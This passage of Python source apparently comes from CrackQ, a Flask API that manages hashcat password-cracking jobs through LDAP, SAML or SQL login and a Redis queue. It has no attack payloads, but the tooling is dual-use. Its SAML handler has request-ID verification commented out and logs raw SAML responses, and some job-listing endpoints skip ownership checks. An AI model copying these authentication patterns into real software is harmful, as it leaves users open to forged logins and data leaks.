user.job_ids and job_id in user.job_ids: jobs = json.loads(user.job_ids) logger.debug('Registered jobs: {}'.format(jobs)) if isinstance(jobs, list): logger.debug('Unregistering job_id: {}'.format(job_id)) if job_id in jobs: jobs.remove(job_id) user.job_ids = json.dumps(jobs) db.session.commit() logger.debug('user.job_ids: {}'.format((user.job_ids))) return True else: logger.error('Error removing job_id') else: logger.debug('Job ID not registered with user') return False def check_jobid(job_id): """Check user owns the job_id""" logger.debug('Checking job_id: {} belongs to user: {}'.format( job_id, current_user.username)) user = User.query.filter_by(username=current_user.username).first() if user.job_ids: if job_id in user.job_ids: return True else: return False else: return False def check_rules(orig_rules): """ Check provided rules list is sane Arguments --------- orig_rules: list List of rules to check Returns ------- rules: list List of rules or False if any are invalid """ logger.debug('Checking rules valid') try: if orig_rules is None: rules = None elif isinstance(orig_rules, list): rules = [] for rule in orig_rules: if rule in CRACK_CONF['rules']: logger.debug('Using rules file: {}'.format(CRACK_CONF['rules'][rule])) rules.append(CRACK_CONF['rules'][rule]) else: logger.debug('Invalid rules provided') rules = False except KeyError: logger.debug('Invalid rules provided') rules = False return rules def check_mask(orig_masks): """ Check provided mask file list is sane Arguments --------- orig_masks: list List of mask files to check Returns ------- mask_files: list List of mask files or False if any are invalid """ logger.debug('Checking mask files are valid') try: if orig_masks is None: mask_file = None elif isinstance(orig_masks, list): mask_file = [] for mask in orig_masks: if mask in CRACK_CONF['masks']: #mask_name = CRACK_CONF['masks'][mask] logger.debug('Using mask file: {}'.format(mask)) mask_file.append(CRACK_CONF['masks'][mask]) return mask_file if len(mask_file) > 0 else None else: logger.debug('Invalid mask file provided') return False except KeyError: logger.debug('Invalid mask file provided') return False # this is just set to use the first mask file in the list for now #mask = mask_file[0] if mask_file else mask def admin_required(func): @wraps(func) def wrap(*args, **kwargs): """Decorator to check user is admin""" try: logger.debug('User authenticating {}'.format(current_user.username)) if current_user.is_admin: return func(*args, **kwargs) except AttributeError as err: logger.debug(err) logger.debug('Anonymous user cant be admin') return abort(401) return wrap def create_user(username, email=None, password=None): """ Adds a new user to the SQLAlchemy datastore Arguments --------- username: string Username to create Returns ------- result: boolean True/False indicating status of delete operation """ if User.query.filter_by(username=username).first(): logger.debug('User already exists') return False else: user = User(username=username, email=email, password=password, is_admin=False) db.session.add(user) db.session.commit() logger.debug('New user added') return True def del_user(user_id): """ Delete a user from the SQLAlchemy datastore Arguments --------- user_id: int User ID number for the user to delete Returns ------- result: boolean True/False indicating status of delete operation """ try: user = User.query.filter_by(id=user_id).first() db.session.delete(user) db.session.commit() return True except AttributeError: return False except exc.UnmappedInstanceError: return False def email_check(email): """ Simple regex check string is an email address Arguments -------- email: str email address string to check Returns ------- match: boolean true/false for valid email match """ regex = r'^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$' if re.search(regex, email): logger.debug('Email address found') return True else: return False def del_job(job): """ Function to delete a job. Used to spawn a thread and wait for jobs to cleanup hashcat proc """ time.sleep(22) logger.debug('Thread: deleting job') job.delete() del_jobid(job.id) @login_manager.user_loader def load_user(user_id): """user_loader function requried as part of Flask login-manager""" return User.query.filter_by(username=user_id).first() class Sso(MethodView): """ SAML2 Single Sign On Class Login class handles saml sso authentication responses from IDP, validates authenticity and authenticates if successful. """ def __init__(self): if CRACK_CONF['auth']['type'] == 'saml2': self.meta_url = CRACK_CONF['auth']['saml_manifest'] self.meta_file = CRACK_CONF['auth']['meta_file'] self.entity_id = CRACK_CONF['auth']['entity_id'] self.group = CRACK_CONF['auth']['group'] self.saml_auth = auth.Saml2(self.meta_url, self.meta_file, self.entity_id) self.saml_client = self.saml_auth.s_client() def get(self): """ Login mechanism, using GET to redirect to SAML IDP. """ if CRACK_CONF['auth']['type'] == 'saml2': self.reqid, info = self.saml_client.prepare_for_authenticate() redirect_url = None for key, value in info['headers']: if key == 'Location': redirect_url = value response = redirect(redirect_url, code=302) return response else: return jsonify(ERR_METH_NOT), 405 @csrf.exempt def post(self): """ Handle returned SAML reponse """ if not CRACK_CONF['auth']['type'] == 'saml2': return jsonify(ERR_METH_NOT), 405 ###***validate ###***readd/fix reqid verification saml_resp = request.form['SAMLResponse'] logger.debug('SAML SSO reponse received:\n {}'.format(saml_resp)) try: saml_parse = self.saml_client.parse_authn_request_response(saml_resp, BINDING_HTTP_POST) except sigver.SignatureError as err: return 'Invalid Signature', 500 except saml2.validate.ResponseLifetimeExceed as err: return 'Invalid SAML Request', 500 #if saml_parse.in_response_to not in self.reqid: # 'Unsolicited authentication response', 500 if saml_parse.authn_statement_ok(): user_info = saml_parse.ava.items() groups = [] for key, val in user_info: if 'name' in key: username = val[0] if 'email' in key: email = val[0] else: email = None if self.group and 'Group' in key: groups = val if self.group: if len(groups) > 0: if self.group not in groups: logger.debug('User authorised, but not in valid domain group') return 'User is not authorised to use this service', 401 else: logger.debug('No groups returned in SAML response') return 'User is not authorised to use this service', 401 #try: # username #except UnboundLocalError: # return {'msg': 'No user returned in SAML response'}, 500 logger.debug('Authenticated: {}'.format(username)) user = load_user(username) if user: crackq.app.session_interface.regenerate(session) else: if email_check(email): create_user(username, email=email) else: create_user(username) user = load_user(username) if isinstance(user, User): crackq.app.session_interface.regenerate(session) login_user(user) else: logger.error('No user object loaded') return jsonify(ERR_BAD_CREDS), 401 return redirect('/') else: ###***add error output to debug logger.debug('Login error') return jsonify(ERR_BAD_CREDS), 401 class Login(MethodView): """ Authentication handler Login class handles authentication, it's protocol agnostic and just needs the 'authenticate' fucntion to provide a 'Success' or 'Failure' result. The 'authenticate' function can use any supported protocols or a custom protocol can be created. """ def post(self): """ Login mechanism, using POST. Supply the following in the body: {"user": "xxx", "password": "xxx"} """ try: marsh_schema = parse_json_schema().load(request.json) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 if CRACK_CONF['auth']['type'] == 'ldap': username = args['user'] password = args['password'] if not username: return jsonify({"msg": "Missing username parameter"}), 400 if not password: return jsonify({"msg": "Missing password parameter"}), 400 ldap_uri = CRACK_CONF['auth']['ldap_server'] ldap_base = CRACK_CONF['auth']['ldap_base'] auther = auth.Ldap() authn = auther.authenticate(ldap_uri, username, password, ldap_base=ldap_base) logger.debug('LDAP reply: {}'.format(authn)) if authn[0] == "Success": logger.debug('Authenticated: {}'.format(username)) user = load_user(username) if user: crackq.app.session_interface.regenerate(session) login_user(user) else: if len(authn) > 1: email = authn[1] else: email = username if email_check(email): logger.debug('Email address found, using for notify') create_user(username, email=email) else: create_user(username) user = load_user(username) if isinstance(user, User): crackq.app.session_interface.regenerate(session) login_user(user) else: logger.error('No user object loaded') return jsonify(ERR_BAD_CREDS), 401 return 'OK', 200 elif authn[0] == "Invalid Credentials": return jsonify(ERR_BAD_CREDS), 401 else: logger.debug('Login error: {}'.format(authn)) return jsonify(ERR_BAD_CREDS), 401 if CRACK_CONF['auth']['type'] == 'sql': user = User.query.filter_by(username=args['user']).first() if isinstance(user, User): if bcrypt.check_password_hash(user.password, args['password']): crackq.app.session_interface.regenerate(session) login_user(user) return 'OK', 200 return jsonify(ERR_BAD_CREDS), 401 else: return jsonify(ERR_METH_NOT) class Logout(MethodView): """ Session Logout Class to logout and clear flask session cookie """ @login_required def get(self): logger.debug('User logged out: {}'.format(current_user.username)) user = User.query.filter_by(username=current_user.username).first() crackq.app.session_interface.destroy(session) user.active = False db.session.commit() logout_user() return 'Logged Out', 200 class Queuing(MethodView): """ Class to interact with the crackqueue module This will instantiate a crackqueue instance and use it to manage jobs in the Redis queue using RQ """ def __init__(self): self.crack_q = crackqueue.Queuer() self.q = self.crack_q.q_connect() rconf = CRACK_CONF['redis'] self.log_dir = CRACK_CONF['files']['log_dir'] self.redis_con = Redis(rconf['host'], rconf['port']) self.req_max = CRACK_CONF['misc']['req_max'] self.speed_q = Queue('speed_check', connection=self.redis_con, serializer=JSONSerializer) def zombie_check(self, started, failed, cur_list): """ This method will check and remove zombie jobs from the started queue. RQ has a bug which causes multiple started jobs to exist after a system error has occured (unplanned exeception of some sort). This method will clean this up and requeus the affected job. """ logger.debug('Checking for zombie jobs') while len(started.get_job_ids()) > 1: logger.debug('Zombie job detected') logger.debug('Started jobs: {}'.format(cur_list)) hung_dict = {} for j in cur_list: job = self.q.fetch_job(j) if job is not None: hung_dict[j] = job.started_at latest = max(hung_dict, key=hung_dict.get) for j in cur_list: if j != latest: job = self.q.fetch_job(j) if job: job.set_status('failed') failed.add(job) logger.debug('Cleaning state job: {}'.format(j)) started.remove(job) try: if job.meta['Requeue Count'] <= int(self.req_max): failed.requeue(j) job.meta['Requeue Count'] += 1 job.save_meta() except KeyError: job.meta['Requeue Count'] = 0 def get_comp_dict(self, comp_list, session=False): """ Function to get complete queue information Arguments --------- comp_list: list list of job IDs in complete queue session: string session ID to reduce returned dictionary to jobs owned by user. Returns ------- comp_dict: dictionary dict containing high-level info for jobs in complete queue """ comp_dict = {} for job_id in comp_list: if session: if check_jobid(job_id): job = self.q.fetch_job(job_id) else: job = None else: job = self.q.fetch_job(job_id) if job: comp_dict[job_id] = {} job_deets = get_jobdetails(job.description) try: if isinstance(job.meta['HC State'], dict): cracked = str(job.meta['HC State']['Cracked Hashes']) total = str(job.meta['HC State']['Total Hashes']) comp_dict[job_id]['Cracked'] = '{}/{}'.format(cracked, total) comp_dict[job_id]['Running Time'] = job.meta['HC State']['Running Time'] try: comp_dict[job_id]['Name'] = get_jobdetails(job.description)['name'] except KeyError: comp_dict[job_id]['Name'] = 'No name' except AttributeError: comp_dict[job_id]['Name'] = 'No name' except KeyError: logger.debug('No HC state, checking state file') job_file = valid.val_filepath(path_string=self.log_dir, file_string='{}.json'.format(job_id)) try: with open(job_file, 'r') as jobfile_fh: job_deets = json.loads(jobfile_fh.read().strip()) comp_dict[job_id]['Name'] = job_deets['name'] cracked = job_deets['Cracked Hashes'] total = job_deets['Total Hashes'] comp_dict[job_id]['Cracked'] = '{}/{}'.format(cracked, total) comp_dict[job_id]['Running Time'] = '0' except FileNotFoundError as err: logger.debug('Failed to open job file: {}'.format(err)) except Exception as err: logger.debug('Failed to open job file: {}'.format(err)) else: logger.error('Job is missing: {}'.format(job_id)) return comp_dict @login_required def get(self, job_id): """ Method to get job status job_id: str hex reprisentation of uuid job ID Returns ------ """ time_now = datetime.now().strftime("%Y-%m-%d %H:%M") time_now = datetime.strptime(time_now, '%Y-%m-%d %H:%M') current_user.last_seen = time_now db.session.commit() ###***re-add this for validation? #args = marsh_schema.data started = rq.registry.StartedJobRegistry(queue=self.q) failed = rq.registry.FailedJobRegistry(queue=self.q) cur_list = started.get_job_ids() ###**update all connections to user get_current_connection()?? self.zombie_check(started, failed, cur_list) q_dict = self.crack_q.q_monitor(self.q) logger.debug('Current jobs: {}'.format(cur_list)) failed_dict = self.crack_q.check_failed(self.q) comp_list = self.crack_q.check_complete(self.q) last_comp = [] end_times = {} if len(comp_list) > 0: ###***make this a function/method for j in comp_list: if check_jobid(j): job = self.q.fetch_job(j) if job: ended = job.ended_at if ended: end_times[j] = ended if len(end_times) > 0: latest = max(end_times, key=end_times.get) else: latest = None if latest: job = self.q.fetch_job(latest) else: job = None if job: try: job_name = get_jobdetails(job.description)['name'] except KeyError: job_name = 'No name' except AttributeError: job_name = 'No name' # just a single job for now last_comp = [{'job_name': job_name, 'job_id': latest}] else: last_comp = [{'job_name': 'None'}] q_dict['Last Complete'] = last_comp logger.debug('Completed jobs: {}'.format(comp_list)) logger.debug('q_dict: {}'.format(q_dict)) if not job_id.isalnum(): return jsonify(ERR_INVAL_JID), 500 if job_id == 'all': ###***definitely make these a function if len(cur_list) > 0: job = self.q.fetch_job(cur_list[0]) if current_user.job_ids and job: if cur_list[0] in json.loads(current_user.job_ids): job.meta['email_count'] = 0 job.save() if job: if 'HC State' in job.meta: ###***remove this? if isinstance(job.meta['HC State'], dict): job_details = get_jobdetails(job.description) try: q_dict['Current Job'][cur_list[0]]['Job Details'] = job_details except KeyError: logger.error('No job to update - does not exist') else: logger.error('No Queue') if len(q_dict) > 0: for qjob_id in q_dict['Queued Jobs']: job = self.q.fetch_job(qjob_id) job_details = get_jobdetails(job.description) q_dict['Queued Jobs'][qjob_id]['Job Details'] = job_details return jsonify(q_dict), 200 elif job_id == 'failed': return jsonify(failed_dict), 200 elif job_id == 'failedless': failess_dict = {} for job_id in failed_dict: if check_jobid(job_id): failess_dict[job_id] = failed_dict[job_id] return jsonify(failess_dict), 200 elif job_id == 'complete': comp_dict = {} comp_dict = self.get_comp_dict(comp_list, session=False) return jsonify(comp_dict), 200 elif job_id == 'completeless': comp_dict = {} comp_dict = self.get_comp_dict(comp_list, session=True) return jsonify(comp_dict), 200 else: try: marsh_schema = parse_json_schema().load({'job_id': job_id}) job_id = marsh_schema['job_id'].hex except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 if check_jobid(job_id): job = self.q.fetch_job(job_id) if job: cracked_file = '{}{}.cracked'.format(self.log_dir, job_id) job_details = get_jobdetails(job.description) if job_id in q_dict['Queued Jobs']: job_dict = { 'Status': 'Queued', 'Time started': None, 'Time finished': None, 'Job Details': job_details, 'Result': job.result, 'HC State': job.meta, } else: job_dict = { 'Status': job.get_status(), 'Time started': str(job.started_at), 'Time finished': str(job.ended_at), 'Job Details': job_details, 'Result': job.result, 'HC State': job.meta, } try: with open(cracked_file, 'r') as cracked_fh: job_dict['Cracked'] = [crack.strip() for crack in cracked_fh] except IOError as err: logger.debug('Cracked file does not exist: {}'.format(err)) return jsonify(job_dict), 200 else: return abort(404) else: return abort(401) @login_required def put(self, job_id): """ Method to reorder the queue This will clear the queued jobs and re-add them in the order specified with a JSON batch add jobord_dict: dict Dictionary containing batch job add details as: {job_id: place} job_id: str hex representation of uuid job ID place: int indicating place in queue Returns ------ """ try: marsh_schema = parse_json_schema().load(request.json) except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return jsonify({'msg': errors.messages}), 500 comp = rq.registry.FinishedJobRegistry(queue=self.q) ###***change this to match reports, validate job_id correctly if job_id == "reorder": logger.debug('Reorder queue command received') logger.debug(marsh_schema['batch_job']) try: adder = Adder() for job in marsh_schema['batch_job']: job_id = job['job_id'] if adder.session_check(self.log_dir, job_id): logger.debug('Valid session found') started = rq.registry.StartedJobRegistry(queue=self.q) cur_list = started.get_job_ids() if job_id in cur_list: logger.error('Job is already running') return {'msg': 'Job is already running'}, 500 marsh_schema['batch_job'].sort(key=itemgetter('place')) for job in self.q.jobs: job.set_status('finished') job.save() comp.add(job, -1) job.cleanup(-1) for job in marsh_schema['batch_job']: Queue.dequeue_any(self.q, None, connection=self.redis_con, serializer=JSONSerializer) j = self.q.fetch_job(job['job_id']) ###***check this covers case when job is in requeued state self.q.enqueue_job(j) j.meta['CrackQ State'] = 'Run/Restored' j.save_meta() return {'msg': 'Queue order updated'}, 200 except Exception as err: ###***fix to specific exception types logger.error('Reorder failed: {}'.format(err)) return {'msg': 'Reorder failed'}, 500 @login_required def patch(self, job_id): """ Method to stop/remove a job from the active queue to complete and cancel current hashcat job if it's already running Arguments --------- job_id: str hex reprisentation of uuid job ID Returns ------ HTTP 204 """ try: marsh_schema = parse_json_schema().load({'job_id': job_id}) job_id = marsh_schema['job_id'].hex except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 try: logger.debug('Stopping job: {:s}'.format(job_id)) job = self.q.fetch_job(job_id) started = rq.registry.StartedJobRegistry(queue=self.q) cur_list = started.get_job_ids() comp = rq.registry.FinishedJobRegistry(queue=self.q) if job_id in cur_list: job.meta['CrackQ State'] = 'Stop' job.save_meta() return 'Stopping Job: Sending signal to Hashcat', 204 else: job.set_status('finished') job.save() comp.add(job, -1) job.cleanup(-1) Queue.dequeue_any(self.q, None, connection=self.redis_con, serializer=JSONSerializer) return 'Stopped Job', 200 except AttributeError as err: logger.debug('Failed to stop job: {}'.format(err)) return jsonify(ERR_INVAL_JID), 404 @login_required def delete(self, job_id): """ Method to remove a job from the queue completely and cancel current hashcat job if it's already running. This will remove all trace of the job Arguments --------- job_id: str hex reprisentation of uuid job ID Returns ------ HTTP 200 or 204 depending on what state job is in """ try: marsh_schema = parse_json_schema().load({'job_id': job_id}) job_id = marsh_schema['job_id'].hex except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 try: logger.debug('Deleting job: {:s}'.format(job_id)) job = self.q.fetch_job(job_id) started = rq.registry.StartedJobRegistry(queue=self.q) cur_list = started.get_job_ids() speed_session = '{}_speed'.format(job_id) speed_job = self.speed_q.fetch_job(speed_session) if speed_job: logger.debug('Deleting Speed Job') speed_job.meta['CrackQ State'] = 'Delete' speed_job.save_meta() if speed_job.get_status() != 'started': speed_job.delete() if job_id in cur_list: job.meta['CrackQ State'] = 'Delete' job.save_meta() del_thread = threading.Thread(target=del_job, args=(job,)) del_thread.start() return {'msg': 'Deleted Job'}, 204 del_jobid(job_id) job.delete() started.cleanup() return {'msg': 'Deleted Job'}, 200 except AttributeError as err: logger.error('Failed to delete job: {}'.format(err)) return jsonify(ERR_INVAL_JID), 404 class Options(MethodView): """ Class for pulling option information, such as a list of available rules and wordlists """ def __init__(self): self.crack_q = crackqueue.Queuer() self.q = self.crack_q.q_connect() rconf = CRACK_CONF['redis'] self.redis_con = Redis(rconf['host'], rconf['port']) @login_required def get(self): """ Method to get config information Returns ------ hc_dict: dictionary crackq config options for rules/wordlists """ hc_rules = [rule for rule in CRACK_CONF['rules']] hc_words = [word for word in CRACK_CONF['wordlists']] hc_maskfiles = [maskfile for maskfile in CRACK_CONF['masks']] hc_modes = dict(hash_modes.HModes.modes_dict()) hc_att_modes = { '0': 'Straight', '1': 'Combination', '3': 'Brute-Force', '6': 'Hybrid Wordlist + Mask', '7': 'Hybrid Mask + Wordlist', } if 'jobtimeout' in CRACK_CONF: timeout_info = CRACK_CONF['jobtimeout'] else: timeout_info = { 'Value': 1814400, 'Modify': False, } hc_dict = { 'Rules': hc_rules, 'Wordlists': hc_words, 'Mask Files': hc_maskfiles, 'Hash Modes': hc_modes, 'Attack Modes': hc_att_modes, 'timeout': timeout_info, } return hc_dict, 200 class Adder(MethodView): """ Separate class for adding jobs """ def __init__(self): self.crack_q = crackqueue.Queuer() self.q = self.crack_q.q_connect() self.log_dir = CRACK_CONF['files']['log_dir'] rconf = CRACK_CONF['redis'] self.redis_con = Redis(rconf['host'], rconf['port']) self.speed_q = Queue('speed_check', connection=self.redis_con, serializer=JSONSerializer) def mode_check(self, mode): """ Mode to check supplied hash mode is supported by Hashcat Arguments --------- mode: int hashcat mode number to check Returns ------- mode: int/boolean returns mode if found else false """ modes_dict = dict(hash_modes.HModes.modes_dict()) logger.debug('Checking hash mode is supported: {}'.format(mode)) if str(mode) in modes_dict.keys(): return int(mode) else: return False def get_restore(self, log_dir, job_id): """ Get restore number from CrackQ json status file Arguments --------- log_dir: str log directory job_id: str job ID string Returns ------- restore: int Restore number to be used with hashcat skip returns 0 on error """ logger.debug('Checking for restore value') if job_id.isalnum(): job_file = valid.val_filepath(path_string=self.log_dir, file_string='{}.json'.format(job_id)) logger.debug('Using session file: {}'.format(job_file)) try: with open(job_file) as fh_job_file: try: status_json = json.loads(fh_job_file.read()) logger.debug('Restoring job details: {}'.format(status_json)) #restore = status_json['Restore Point'] return status_json except IOError as err: logger.warning('Invalid job ID: {}'.format(err)) return False except TypeError as err: logger.warning('Invalid job ID: {}'.format(err)) return False except IOError as err: logger.warning('Restore file Error: {}'.format(err)) return False #except json.decoder.JSONDecodeError as err: ###***make explicit except Exception as err: logger.warning('Restore file Error: {}'.format(err)) return False else: logger.warning('Invalid job ID') return False def session_check(self, log_dir, job_id): """ Check for existing session and return the ID if present else False Arguments --------- log_dir: str directory containing cracker log and session files job_id: str job/session id string (alnum) Returns ------- sess_id: bool True if session/job ID is valid and present """ logger.debug('Checking for existing session') log_dir = Path(log_dir) sess_id = False if job_id.isalnum(): try: #files = [f for f in Path.iterdir(log_dir)] for f in Path.iterdir(log_dir): if job_id in str(f): sess_id = True break except ValueError as err: logger.debug('Invalid session ID: {}'.format(err)) sess_id = False except Exception as err: logger.warning('Invalid session: {}'.format(err)) sess_id = False else: logger.debug('Invalid session ID provided') sess_id = False if sess_id is not False: logger.debug('Existing session found') return sess_id def speed_check(self, q_args=None): """ Method to run initial speed/show check in hashcat This will get information related to estimated speed for brain enablement, but also check for any quick wins in the pot file before the job actually gets to the top of the queue. It takes the job ID queues a separate job in a separate queue that will pause any current hashcat jobs and briefly run the speed/show checks, then resumes the job. ####***UPDATE THIS DOCUMENTATION Arguments --------- job_id: uuid Job ID to update Returns ------ ret: boolean Success/Fail """ logger.debug('Running speed check') if q_args: speed_args = {} speedq_args = {} speed_args['hash_file'] = q_args['kwargs']['hash_file'] speed_session = '{}_speed'.format(q_args['kwargs']['session']) speed_args['speed_session'] = speed_session speed_args['session'] = q_args['kwargs']['session'] speed_args['wordlist'] = q_args['kwargs']['wordlist'] speed_args['wordlist2'] = q_args['kwargs']['wordlist2'] speed_args['hash_mode'] = q_args['kwargs']['hash_mode'] speed_args['username'] = q_args['kwargs']['username'] speed_args['name'] = q_args['kwargs']['name'] speed_args['brain'] = q_args['kwargs']['brain'] speed_args['attack_mode'] = q_args['kwargs']['attack_mode'] speed_args['mask'] = '?a?a?a?a?a?a' if q_args['kwargs']['mask'] else None speed_args['pot_path'] = q_args['kwargs']['pot_path'] speedq_args['kwargs'] = speed_args speedq_args['job_id'] = speed_session self.crack_q.q_add(self.speed_q, speedq_args, timeout=400) logger.debug('Queuing speed check') return True return False @login_required def post(self): """ Method to post a new job to the queue job_id: str hex representation of uuid job ID Returns ------ boolean True/False success failure HTTP_status: int HTTP status, 201 or 500 """ try: marsh_schema = parse_json_schema().load(request.json) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 try: job_id = args['job_id'].hex except KeyError as err: logger.debug('No job ID provided') job_id = None except AttributeError as err: logger.debug('No job ID provided') job_id = None # Check for existing session info ###***make this a method if job_id: if job_id.isalnum(): if self.session_check(self.log_dir, job_id): logger.debug('Valid session found') started = rq.registry.StartedJobRegistry(queue=self.q) cur_list = started.get_job_ids() q_dict = self.crack_q.q_monitor(self.q) if job_id in cur_list: logger.error('Job is already running') return jsonify({'msg': 'Job is already running'}), 500 if job_id in q_dict['Queued Jobs'].keys(): logger.error('Job is already queued') return jsonify({'msg': 'Job is already queued'}), 500 outfile = str(valid.val_filepath(path_string=self.log_dir, file_string='{}.cracked'.format(job_id))) hash_file = str(valid.val_filepath(path_string=self.log_dir, file_string='{}.hashes'.format(job_id))) pot_path = str(valid.val_filepath(path_string=self.log_dir, file_string='crackq.pot')) job_deets = self.get_restore(self.log_dir, job_id) job = self.q.fetch_job(job_id) # lgtm if not job_deets: logger.debug('Job restor error. Never started') return jsonify({'msg': 'Error restoring job'}), 500 elif not job_deets['restore']: logger.debug('Job not previously started, restore = 0') job_deets['restore'] = 0 elif job_deets['restore'] == 0: logger.debug('Job not previously started, restore = 0') wordlist = None wordlist2 = None rules = None if 'wordlist' in job_deets: if job_deets['wordlist'] in CRACK_CONF['wordlists']: wordlist = CRACK_CONF['wordlists'][job_deets['wordlist']] if 'wordlist2' in job_deets: if job_deets['wordlist2']: if job_deets['wordlist2'] in CRACK_CONF['wordlists']: wordlist2 = CRACK_CONF['wordlists'][job_deets['wordlist2']] if 'rules' in job_deets: rules = check_rules(job_deets['rules']) if rules is False: return jsonify({'msg': 'Invalid rules selected'}), 500 mask_file = check_mask(job_deets['mask']) # this is just set to use the first mask file in the list for now mask = mask_file if mask_file else job_deets['mask'] try: ###***make this (timeout - running time) for restored jobs?? timeout = job_deets['timeout'] except KeyError as err: logger.warning('No timeout info in job details, using default') timeout = 1814400 hc_args = { 'hash_file': hash_file, 'session': job_id, 'wordlist': wordlist, 'wordlist2': wordlist2, 'mask': mask, 'mask_file': True if mask_file else False, 'attack_mode': int(job_deets['attack_mode']), 'hash_mode': int(job_deets['hash_mode']), 'outfile': outfile, 'rules': rules, 'restore': job_deets['restore'], 'username': job_deets['username'] if 'user' in job_deets else None, 'increment': job_deets['increment'] if 'increment' in job_deets else None, 'increment_min': job_deets['increment_min'] if 'increment_min' in job_deets else None, 'increment_max': job_deets['increment_max'] if 'increment_max' in job_deets else None, 'brain': False if 'disable_brain' in job_deets else True, 'name': job_deets['name'] if 'name' in job_deets else None, 'pot_path': pot_path, } job = self.q.fetch_job(job_id) job.meta['CrackQ State'] = 'Run/Restored' job.save_meta() else: return jsonify(ERR_INVAL_JID), 500 else: return jsonify(ERR_INVAL_JID), 500 else: logger.debug('Creating new session') job_id = uuid.uuid4().hex add_jobid(job_id) outfile = str(valid.val_filepath(path_string=self.log_dir, file_string='{}.cracked'.format(job_id))) hash_file = str(valid.val_filepath(path_string=self.log_dir, file_string='{}.hashes'.format(job_id))) pot_path = str(valid.val_filepath(path_string=self.log_dir, file_string='crackq.pot')) try: attack_mode = int(args['attack_mode']) except TypeError: attack_mode = None try: logger.debug('Writing hashes to file: {}'.format(hash_file)) with open(hash_file, 'w') as hash_fh: for hash_l in args['hash_list']: hash_fh.write(hash_l.rstrip() + '\n') except KeyError as err: logger.debug('No hash list provided: {}'.format(err)) return jsonify({'msg': 'No hashes provided'}), 500 except IOError as err: logger.debug('Unable to write to hash file: {}'.format(err)) return jsonify({'msg': 'System error'}), 500 try: args['hash_mode'] check_m = self.mode_check(args['hash_mode']) except KeyError: check_m = False logger.debug('Hash mode check: {}'.format(check_m)) ###***change to if check_m if check_m is not False: try: mode = int(check_m) except TypeError as err: logger.error('Incorrect type supplied for hash_mode:' '\n{}'.format(err)) return jsonify({'msg': 'Invalid hash mode selected'}), 500 else: return jsonify({'msg': 'Invalid hash mode selected'}), 500 if attack_mode != 3: if args['wordlist'] in CRACK_CONF['wordlists']: wordlist = CRACK_CONF['wordlists'][args['wordlist']] else: return jsonify({'msg': 'Invalid wordlist selected'}), 500 if attack_mode == 1: if 'wordlist2' in args: if args['wordlist2'] in CRACK_CONF['wordlists']: wordlist2 = CRACK_CONF['wordlists'][args['wordlist2']] else: return jsonify({'msg': 'Combinator mode requires 2 wordlists'}), 500 else: wordlist2 = None try: mask_file = check_mask(args['mask_file']) except KeyError: mask_file = None try: mask = args['mask'] except KeyError: mask = None ####***this is just set to use the first mask file in the list for now mask = mask_file[0] if mask_file else mask rules = check_rules(args['rules']) if rules is False: return {'msg': 'Invalid rules selected'}, 500 try: username = args['username'] except KeyError as err: logger.debug('Username value not provided') username = False try: increment = args['increment'] except KeyError as err: logger.debug('Increment value not provided') increment = False try: increment_min = args['increment_min'] except KeyError as err: logger.debug('Increment min value not provided') increment_min = None try: increment_max = args['increment_max'] except KeyError as err: logger.debug('Increment max value not provided') increment_max = None try: if args['disable_brain']: logger.debug('Brain disabled') brain = False else: brain = True except KeyError as err: logger.debug('Brain not disabled: {}'.format(err)) brain = True try: name = args['name'] except KeyError as err: logger.debug('Name value not provided') name = None timeout = 1814400 if 'jobtimeout' in CRACK_CONF: if not CRACK_CONF['jobtimeout']['Modify']: logger.debug('Timeout modification not permitted') timeout = CRACK_CONF['jobtimeout']['Value'] else: if 'timeout' in args: timeout = args['timeout'] hc_args = { 'hash_file': hash_file, 'session': job_id, 'wordlist': wordlist if attack_mode != 3 else None, 'wordlist2': wordlist2 if attack_mode == 1 else None, 'mask': mask if attack_mode > 2 else None, 'mask_file': True if mask_file else False, 'attack_mode': attack_mode, 'hash_mode': mode, 'outfile': outfile, 'rules': rules, 'username': username, 'increment': increment, 'increment_min': increment_min, 'increment_max': increment_max, 'brain': brain, 'name': name, 'pot_path': pot_path, 'restore': 0, } q_args = { 'job_id': job_id, 'kwargs': hc_args, } try: q = self.crack_q.q_connect() try: if hc_args['restore'] > 0: job = self.q.fetch_job(job_id) if job.meta['brain_check']: logger.debug('Brain check previously complete') elif job.meta['brain_check'] is None: self.speed_check(q_args=q_args) time.sleep(3) else: logger.debug('Restored job, disabling speed check') else: logger.debug('Job not a restore, queuing speed_check') self.speed_check(q_args=q_args) time.sleep(3) ###***remove below now? except KeyError as err: logger.debug('Job not a restore, queuing speed_check') self.speed_check(q_args=q_args) time.sleep(3) self.crack_q.q_add(q, q_args, timeout=timeout) logger.debug('API Job {} added to queue'.format(job_id)) logger.debug('Job Details: {}'.format(q_args)) job = self.q.fetch_job(job_id) job.meta['email_count'] = 0 if 'notify' in args: job.meta['notify'] = args['notify'] else: job.meta['notify'] = False if current_user.email: if email_check(current_user.email): job.meta['email'] = str(current_user.email) job.meta['last_seen'] = str(current_user.last_seen) elif email_check(current_user.username): job.meta['email'] = current_user.username job.meta['last_seen'] = str(current_user.last_seen) job.meta['CrackQ State'] = 'Run/Restored' job.meta['Speed Array'] = [] job.save_meta() return job_id, 202 except KeyError as err: logger.warning('Key missing from meta data:\n{}'.format(err)) return job_id, 202 except TypeError as err: logger.warning('Type error in job meta data:\n{}'.format(err)) return job_id, 202 def reporter(cracked_path, report_path): """ Simple method to call pypal and save report (html & json) """ nltk.download('wordnet') report = pypal.Report(cracked_path=cracked_path, lang='EN', lists='/opt/crackq/build/pypal/src/lists/') report_json = report.report_gen() with open(report_path, 'w') as fh_report: fh_report.write(json.dumps(report_json)) return True class Reports(MethodView): """ Class for creating and serving HTML password analysis reports Calls pypal with the location of the specified crackq output file for a given job_id, provided auth is accepted """ def __init__(self): self.crack_q = crackqueue.Queuer() self.q = self.crack_q.q_connect() self.report_q = self.crack_q.q_connect(queue='reports') rconf = CRACK_CONF['redis'] self.redis_con = Redis(rconf['host'], rconf['port']) self.report_dir = CRACK_CONF['reports']['dir'] self.log_dir = CRACK_CONF['files']['log_dir'] self.adder = Adder() @login_required def get(self, 